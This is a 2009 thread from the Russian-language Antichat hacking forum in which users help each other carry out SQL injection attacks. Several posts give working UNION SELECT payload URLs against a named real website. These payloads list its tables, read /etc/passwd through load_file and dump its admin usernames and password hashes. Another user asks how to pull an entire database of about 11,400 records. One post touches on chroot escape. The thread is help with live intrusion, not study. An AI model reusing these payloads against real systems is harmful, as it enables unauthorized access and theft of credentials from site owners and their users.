ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

03.07.2009, 15:14
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Ок спасибо!
Вот такой еще вопрос...
В таблице слишком много колонок! Хотелось бы вывести токо определенные результаты (к примеру от одного до 50)
Как это сделать? (и можно ли это вообще сделать)
|
|
|

03.07.2009, 15:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от diznt
Ок спасибо!
Вот такой еще вопрос...
В таблице слишком много колонок! Хотелось бы вывести токо определенные результаты (к примеру от одного до 50)
Как это сделать? (и можно ли это вообще сделать)
Если тебе нужно вывести от 1 до 5 колонок СРАЗУ,то limit 1,5 должно помочь )(Мне помогало)
Если нужно вывести записи из конкретных строк или колонок,то:
1+union+select+1,2,3,username,password,6--
или так:
1+union+select+1,2,3,concat_ws(разделите ьв HEX,username,password),5,6
или так:
1+union+select+1,2,3,concat(разделитель ,username,разделитель,password,разд елитель)
Если не ошибаюсь,конечно
Это всё работает при MySql.
конкретную запись вывести,тогда так:
1+union+select+1,2,3,4,username,6+from+users+limit +x,1, где х - произвольный номер записи в таблице.
|
|
|

03.07.2009, 15:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
diznt,для того,чтобы грамотно выводилось,нужно всегда объединять поля в таблице.У меня тоже иногда косяки случаются.Выводит тебе Ouknown column,потому что MySql не понял,что перед ним хекс данные - и правильно сделал,так как ты убрал 0x,который и отличает hex от oct (типы данных).В некоторых языках программирования можно и 0 ставить спереди,в некоторых необходимо только 0х.Когда ты пишешь спереди 0x(тут_число в HEX),то он понимает,что перед ним HEX данные,и преобразует их обратно.Так как ты передаёшь данные в кавычках,то он преобразует их в строку.
Ответ будет аналогичен твоему,если ты подставишь в where username='sasasa'.Ошбка та же.
|
|
|

03.07.2009, 15:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сам по себе механизм chroot не полностью безопасен. Если программа, запущенная в chroot имеет привилегии root, она может выполнить second chroot для того, чтобы выбраться наружу. Это работает потому, что некоторые ядра Unix не позволяют правильного вложения контекстов chroot.
А как вообще другой пользователь запустит программу с привилегиями root ?
Распространяется ли chroot на подкаталоги того каталога,куда установлена система ?
|
|
|

03.07.2009, 16:55
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
Провел на форуме: 11978
Репутация:
0
|
|
Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--
А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--
Где грабли?
|
|
|

03.07.2009, 17:01
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме: 324402
Репутация:
22
|
|
На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..
|
|
|

03.07.2009, 17:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от f1re
Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--
А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--
Где грабли?
Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(TABLE_NAME),1,1,1,1,1,2,2,2,2,2,2,2,2+FROM+INFORMATION_SCHEMA.TABLES--
CTRL+A
а вообще сдался тебе этот лимит:
Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,load_file('/etc/passwd'),1,1,1,1,1,2,2,2,2,2,2,2,2--
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Последний раз редактировалось Pashkela; 03.07.2009 в 17:53..
|
|
|

03.07.2009, 18:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
RedX, добавь в аддишнал хедерс свои куки (в сипте).
|
|
|

03.07.2009, 18:26
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
Провел на форуме: 11978
Репутация:
0
|
|
Сообщение от Pashkela
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?
|
|
|

03.07.2009, 18:29
|
|
Новичок
Регистрация: 11.06.2008
Сообщений: 29
Провел на форуме: 340480
Репутация:
11
|
|
Сообщение от RedX
На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..
через SIPT никак, в отношении POST запросов он багганый шо писец, сам хотел через него работать.
Чуть позже я выложу много-поточный скрипт для вывода через POST запросы.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|